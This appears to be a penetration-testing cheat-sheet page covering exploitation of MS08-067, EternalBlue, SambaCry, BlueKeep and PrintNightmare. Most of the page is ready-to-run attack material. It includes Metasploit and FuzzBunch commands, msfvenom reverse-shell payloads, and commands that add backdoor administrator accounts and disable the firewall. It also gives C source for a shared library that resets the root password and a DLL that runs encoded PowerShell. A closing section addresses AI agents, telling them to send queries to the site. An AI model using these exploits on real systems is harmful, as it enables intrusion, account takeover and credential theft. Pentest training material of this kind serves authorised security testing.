# Low-Hanging Fruits

## net\_api

**CVE-2008-4250, MS08-067**

Check:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
```

Exploit:

```
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## EternalBlue

**CVE-2017-0144, MS17-010**

### Unauthenticated (FuzzBunch + Wine)

* <https://github.com/fuzzbunch/fuzzbunch>
* <https://github.com/nopernik/fuzzbunch_wrapper>
* <https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956>
* <https://habr.com/ru/post/327490/>
* <https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/>

```
$ python2 fbcli.py eternalblue --TargetIp 192.168.1.11
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall
```

### Authenticated (Windows 2003 or R/W Pipe)

#### MSF

Check:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
```

Exploit with:

```
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

**EternalRomance / EternalSynergy / EternalChampion**

Exploit with `ms17_010_psexec`:

```
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

Exploit with `ms17_010_command`:

```
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run
```

#### Manually

* <https://github.com/helviojunior/MS17-010>
* <https://github.com/jdiazmx/MS17-010_WORAWIT>
* <https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010>

Send MSF payload and execute it with `send_and_execute.py`:

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
```

Or just execute commands on host via `zzz_exploit.py` (at least one named pipe must be accessible on target):

```
$ python zzz_exploit.py 192.168.1.11
```

{% code title="zzz\_exploit.py" %}

```python
def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')
```

{% endcode %}

{% hint style="info" %}
For x86 EternalBlue shellcodes use [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) (very unstable).
{% endhint %}

A feature for grabbing registry secrets in one shot:

```
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch
```

## SambaCry

**CVE-2017-7494** (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

### MSF

```
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
```

### Manually

* <https://github.com/opsxcq/exploit-CVE-2017-7494>
* <https://github.com/joxeankoret/CVE-2017-7494>

Compile `.so` SUID shared library:

{% code title="pwn.c" %}

```c
// gcc -shared -fPIC -o pwn.so pwn.c

#include <stdio.h>
#include <stdlib.h>

static void pwn() __attribute__((constructor));

void pwn() {
	setresuid(0,0,0);
	system("echo 'root:Passw0rd!'|chpasswd");
}
```

{% endcode %}

Get real share path on the target's filesystem:

```
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename
```

Upload `pwn.so` to target and then run the exploit:

```
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
```

## BlueKeep

**CVE-2019-0708**

Check:

```
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
```

Exploit:

```
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## PrintNightmare

**CVE-2021-16751, CVE-2021-34527**

* <https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html>
* <https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/>
* <https://itm4n.github.io/printnightmare-exploitation/>

### Check

#### CrackMapExec

* <https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py>

```
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
```

#### ItWasAllADream

* <https://github.com/byt3bl33d3r/ItWasAllADream>

```
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'
```

### Exploit

#### C/C++

RCE (fork of the original repo):

* <https://github.com/afwu/PrintNightmare>

LPE:

* <https://github.com/hlldz/CVE-2021-1675-LPE>

#### Python

RCE:

* <https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py>
* <https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py>
* <https://www.hackthebox.eu/blog/windows-protocols-python>

**Usage**

1. Prepare [an SMB share with anonymous authentication](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/smb-rpc.md#smb-share-with-null-authentication) allowed (`smbserver.py` also works):
2. Generate an evil DLL: a С2 stager / add user to a privileged group ([1](https://github.com/newsoft/adduser), [2](https://github.com/calebstewart/CVE-2021-1675/blob/main/nightmare-dll/nightmare/dllmain.cpp), [3](https://github.com/calebstewart/CVE-2021-1675/tree/main/nightmare-dll), etc.) / invoke a [custom](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own) command (see example below).
3. Run the exploit:

```
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
```

{% code title="pwn.c" %}

```c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Default function that is executed when the DLL is loaded
void Entry() {
    system("powershell -enc <BASE64_PWSH_CODE>");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
```

{% endcode %}

{% embed url="<https://snovvcrash.github.io/2021/06/30/leveraging-printnightmare-to-abuse-rbcd.html>" %}

#### C\#

RCE + LPE:

* <https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare>

#### PowerShell

LPE:

* <https://github.com/calebstewart/CVE-2021-1675>

### Reproducibility

Flowchart by [@wdormann](https://twitter.com/wdormann):

{% embed url="<https://twitter.com/wdormann/status/1412906574998392840>" %}

### Mitigation

* <https://github.com/LaresLLC/CVE-2021-1675>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.